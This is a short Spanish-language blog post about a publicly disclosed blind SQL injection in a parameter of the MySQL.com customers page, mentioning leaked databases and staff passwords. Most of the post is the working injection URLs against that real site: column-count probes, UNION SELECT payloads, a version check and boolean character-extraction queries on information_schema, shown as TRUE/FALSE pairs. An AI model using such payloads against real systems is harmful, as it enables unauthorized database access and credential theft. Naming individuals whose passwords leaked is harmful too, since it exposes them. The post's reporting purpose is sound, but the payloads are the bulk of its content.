MySQL.com vulnerable a Blind SQL Injection

Esta tarde hablaba con Arán en Twitter sobre de la publicación de una vulnerabilidad de inyecciones SQL ciegas contra el mismísimo portal de MySQL.com. Jackh4x0r decidió publicar esta misma mañana los detalles sobre un parámetro vulnerable que TinKode y Ne0h ya descubrieron en enero de este mismo año, además de otra vulnerabilidad de tipo XSS.

El caso es que, si seguís los enlaces, veréis que han salido a la luz las bases de datos del site, las tablas y columnas, y hasta los usuarios y las contraseñas de Robin Schumacher (director) Kaj Arnö y muchos otros. Todo, como os comentaba, gracias a una inyección ciega
basada en error:

http://www.mysql.com/customers/industry/?id=85)+ORDER+BY+10--+
http://www.mysql.com/customers/industry/?id=85)+ORDER+BY+11--+

http://www.mysql.com/customers/industry/?id=85)+AND+1=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--+
http://www.mysql.com/customers/industry/?id=85)+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--+
http://www.mysql.com/customers/industry/?id=85)+OR+1=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--+



VERSION :::::
http://www.mysql.com/customers/industry/?id=85)+AND+substring(@@version,1,1)=5+AND+(5742=5742
http://www.mysql.com/customers/industry/?id=85)+AND+substring(@@version,1,1)=5--+


==================================================================================================



TRUE
----------------


http://www.mysql.com/customers/industry/?id=85)+AND+ORD(MID((SELECT+DISTINCT(IFNULL(CAST(schema_name+AS+CHAR(10000)),+CHAR(32)))+FROM+information_schema.SCHEMATA+LIMIT+24,1),6,1))>45+AND+(5742=5742
http://www.mysql.com/customers/industry/?id=85%29+AND+1=1+AND+%285742=5742



FALSE
--------------

http://www.mysql.com/customers/industry/?id=85)+AND+ORD(MID((SELECT+DISTINCT(IFNULL(CAST(schema_name+AS+CHAR(10000)),+CHAR(32)))+FROM+information_schema.SCHEMATA+LIMIT+24,1),6,1))>423423423445+AND+(5742=5742
http://www.mysql.com/customers/industry/?id=85%29+AND+1=2+AND+%285742=5742


===================================================================================================

Comentarios